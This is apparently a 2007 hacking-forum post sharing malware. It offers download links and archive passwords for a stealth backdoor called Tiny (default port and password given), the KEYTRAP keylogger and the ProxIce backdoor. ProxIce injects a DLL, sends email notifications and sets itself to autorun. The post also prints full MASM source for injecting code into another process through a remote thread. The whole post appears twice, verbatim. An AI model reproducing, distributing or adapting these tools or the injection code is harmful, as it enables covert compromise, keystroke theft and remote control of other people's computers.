Isis
23.09.2007, 00:17
Tiny v3.2
Tiny is a small backdoor which installs itself in stealth and can be removed again by connecting to it and chosing the correct option from the menu.
Connect to Tiny using netcat since Tiny won't allow you to enter the password using telnet.
Default port is: 63714
Password: Tiny
Download Tiny (http://rapidshare.com/files/57535209/Tiny_3.2_-__xeka.ru_.rar)
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]
[masm] fwb+ example
Function injection (FWB+) example by shapeless
- http://swerat.com
- http://chasenet.org
thanks to ksv for the Inject-code :)
^
.386
.model flat, stdcall
option casemap: none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\masm32.lib
includelib \masm32\lib\kernel32.lib
FuncSize MACRO L1, L2
mov eax,L2
sub eax,L1
ENDM
TInjData struc
GetAddr dword ?
LoadLib dword ?
szUser32 byte 16 dup(0)
szMsgBox byte 32 dup(0)
TInjData ends
.data
szApp db "notepad.exe",0
szUsr32 db "user32.dll",0
szKrnl32 db "kernel32.dll",0
szMsgbox db "MessageBoxA",0
szLoadLib db "LoadLibraryA",0
szGetProcAddr db "GetProcAddress",0
.data?
SInfo STARTUPINFO <>
PInfo PROCESS_INFORMATION <>
InjData TInjData <>
pFunc dword ?
dwThreadID dword ?
hKernel dword ?
.code
; Thanks to ksv for c++ example of this code :)
Inject proc uses esi hProcess:dword,dwSize:dword,Code:dword
LOCAL dwOldProtect:dword
LOCAL dwWritten:dword
invoke VirtualAllocEx,hProcess,0,dwSize,MEM_COMMIT+MEM_RE SERVE,PAGE_EXECUTE_READWRITE
.if eax==0
ret
.endif
mov esi,eax
invoke VirtualProtectEx,hProcess,esi,dwSize,PAGE_EXECUTE_ READWRITE,addr dwOldProtect
.if eax==0
ret
.endif
invoke WriteProcessMemory,hProcess,esi,Code,dwSize,addr dwWritten
.if eax==0
ret
.endif
mov eax,esi
ret
Inject endp
Label1:
remotefunc PROC uses esi iData:DWORD
; Code:
; invoke Loadlibrary,szUser32
; invoke GetProcAddres,hUser32,szMessagebox
; invoke Messagebox,0,0,0,0
mov esi,iData
assume esi:ptr TInjData
lea ecx,[esi].szUser32
push ecx
call [esi].LoadLib
lea ecx,[esi].szMsgBox
push ecx
push eax
call [esi].GetAddr
push 0
push 0
push 0
push 0
call eax
assume esi:nothing
ret
remotefunc endp
Label2:
__ep:
; create new process
invoke RtlZeroMemory,addr SInfo,SizeOf STARTUPINFO
invoke CreateProcess,0,addr szApp,0,0,FALSE,0,0,0,addr SInfo,addr PInfo
; prep the structure
invoke lstrcpy,addr InjData.szUser32,addr szUsr32
invoke lstrcpy,addr InjData.szMsgBox,addr szMsgbox
invoke GetModuleHandle,addr szKrnl32
mov hKernel,eax
invoke GetProcAddress,hKernel,addr szLoadLib
mov InjData.LoadLib,eax
invoke GetProcAddress,hKernel,addr szGetProcAddr
mov InjData.GetAddr,eax
; inject function
FuncSize Label1,Label2
invoke Inject,PInfo.hProcess,eax,offset remotefunc
jz EOF
mov pFunc,eax
; inject the structure
invoke Inject,PInfo.hProcess,sizeof TInjData,offset InjData
jz EOF
invoke CreateRemoteThread,PInfo.hProcess,0,0,pFunc,eax,0, addr dwThreadID
EOF:
invoke ExitProcess,0
end __ep
KEYTRAP
KEYTRAP v1.0 - Keyboard Key Logger
By Dcypher (Dcypher@aol.com)
Usage: KEYTRAP <dir\logfile> /A /B /C
A - Maximum size of log file.
B - Number of keys to log per session.
C - Minutes between each session.
Download Keytrap (http://rapidshare.com/files/57535275/Keytrap_-__xeka.ru_.rar)
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]
ProxIce 2.0 - backdoor DLL injection
First of all, thank you to use this program
Writing 100% pure ASM, with MASM & WinASM.
Functions:
- Injection of a thread which him even load a DLL infectious
- Encoding of the data inside the waiter
- Password not deciphered in memory
- Notification by email
- EditServer
- Installation in one cl?e of the BDR for autorun
- Test of connection
- Backdoor on the port of your choice
- Total Comment of the sources
This program was concu and programmed for the mag #1 of n0name, thank you has
Aphex for the type of injection, and? it is all. Thank you bleyme has for
to have thrown an eye on my sources, thank you in fact has all the TEAM n0name
to be what it is? this backdoor is the proof that one can
quickly to make a backdoor simple, effective, and so much is little
furtive of very small size? the sources are A titrates educational
and will allow has those which wish it to learn a little while including/understanding
why and what is done.
You will need NetCat to connect you to the waiter, delivered with
the pack. With the fact, this backdoor is concue for XP/NT.
Amuse well
Download ProxIce (http://rapidshare.com/files/57535256/ProxIce-2.0_-__xeka.ru_.rar)
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]
Tiny is a small backdoor which installs itself in stealth and can be removed again by connecting to it and chosing the correct option from the menu.
Connect to Tiny using netcat since Tiny won't allow you to enter the password using telnet.
Default port is: 63714
Password: Tiny
Download Tiny (http://rapidshare.com/files/57535209/Tiny_3.2_-__xeka.ru_.rar)
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]
[masm] fwb+ example
Function injection (FWB+) example by shapeless
- http://swerat.com
- http://chasenet.org
thanks to ksv for the Inject-code :)
^
.386
.model flat, stdcall
option casemap: none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\masm32.lib
includelib \masm32\lib\kernel32.lib
FuncSize MACRO L1, L2
mov eax,L2
sub eax,L1
ENDM
TInjData struc
GetAddr dword ?
LoadLib dword ?
szUser32 byte 16 dup(0)
szMsgBox byte 32 dup(0)
TInjData ends
.data
szApp db "notepad.exe",0
szUsr32 db "user32.dll",0
szKrnl32 db "kernel32.dll",0
szMsgbox db "MessageBoxA",0
szLoadLib db "LoadLibraryA",0
szGetProcAddr db "GetProcAddress",0
.data?
SInfo STARTUPINFO <>
PInfo PROCESS_INFORMATION <>
InjData TInjData <>
pFunc dword ?
dwThreadID dword ?
hKernel dword ?
.code
; Thanks to ksv for c++ example of this code :)
Inject proc uses esi hProcess:dword,dwSize:dword,Code:dword
LOCAL dwOldProtect:dword
LOCAL dwWritten:dword
invoke VirtualAllocEx,hProcess,0,dwSize,MEM_COMMIT+MEM_RE SERVE,PAGE_EXECUTE_READWRITE
.if eax==0
ret
.endif
mov esi,eax
invoke VirtualProtectEx,hProcess,esi,dwSize,PAGE_EXECUTE_ READWRITE,addr dwOldProtect
.if eax==0
ret
.endif
invoke WriteProcessMemory,hProcess,esi,Code,dwSize,addr dwWritten
.if eax==0
ret
.endif
mov eax,esi
ret
Inject endp
Label1:
remotefunc PROC uses esi iData:DWORD
; Code:
; invoke Loadlibrary,szUser32
; invoke GetProcAddres,hUser32,szMessagebox
; invoke Messagebox,0,0,0,0
mov esi,iData
assume esi:ptr TInjData
lea ecx,[esi].szUser32
push ecx
call [esi].LoadLib
lea ecx,[esi].szMsgBox
push ecx
push eax
call [esi].GetAddr
push 0
push 0
push 0
push 0
call eax
assume esi:nothing
ret
remotefunc endp
Label2:
__ep:
; create new process
invoke RtlZeroMemory,addr SInfo,SizeOf STARTUPINFO
invoke CreateProcess,0,addr szApp,0,0,FALSE,0,0,0,addr SInfo,addr PInfo
; prep the structure
invoke lstrcpy,addr InjData.szUser32,addr szUsr32
invoke lstrcpy,addr InjData.szMsgBox,addr szMsgbox
invoke GetModuleHandle,addr szKrnl32
mov hKernel,eax
invoke GetProcAddress,hKernel,addr szLoadLib
mov InjData.LoadLib,eax
invoke GetProcAddress,hKernel,addr szGetProcAddr
mov InjData.GetAddr,eax
; inject function
FuncSize Label1,Label2
invoke Inject,PInfo.hProcess,eax,offset remotefunc
jz EOF
mov pFunc,eax
; inject the structure
invoke Inject,PInfo.hProcess,sizeof TInjData,offset InjData
jz EOF
invoke CreateRemoteThread,PInfo.hProcess,0,0,pFunc,eax,0, addr dwThreadID
EOF:
invoke ExitProcess,0
end __ep
KEYTRAP
KEYTRAP v1.0 - Keyboard Key Logger
By Dcypher (Dcypher@aol.com)
Usage: KEYTRAP <dir\logfile> /A /B /C
A - Maximum size of log file.
B - Number of keys to log per session.
C - Minutes between each session.
Download Keytrap (http://rapidshare.com/files/57535275/Keytrap_-__xeka.ru_.rar)
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]
ProxIce 2.0 - backdoor DLL injection
First of all, thank you to use this program
Writing 100% pure ASM, with MASM & WinASM.
Functions:
- Injection of a thread which him even load a DLL infectious
- Encoding of the data inside the waiter
- Password not deciphered in memory
- Notification by email
- EditServer
- Installation in one cl?e of the BDR for autorun
- Test of connection
- Backdoor on the port of your choice
- Total Comment of the sources
This program was concu and programmed for the mag #1 of n0name, thank you has
Aphex for the type of injection, and? it is all. Thank you bleyme has for
to have thrown an eye on my sources, thank you in fact has all the TEAM n0name
to be what it is? this backdoor is the proof that one can
quickly to make a backdoor simple, effective, and so much is little
furtive of very small size? the sources are A titrates educational
and will allow has those which wish it to learn a little while including/understanding
why and what is done.
You will need NetCat to connect you to the waiter, delivered with
the pack. With the fact, this backdoor is concue for XP/NT.
Amuse well
Download ProxIce (http://rapidshare.com/files/57535256/ProxIce-2.0_-__xeka.ru_.rar)
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]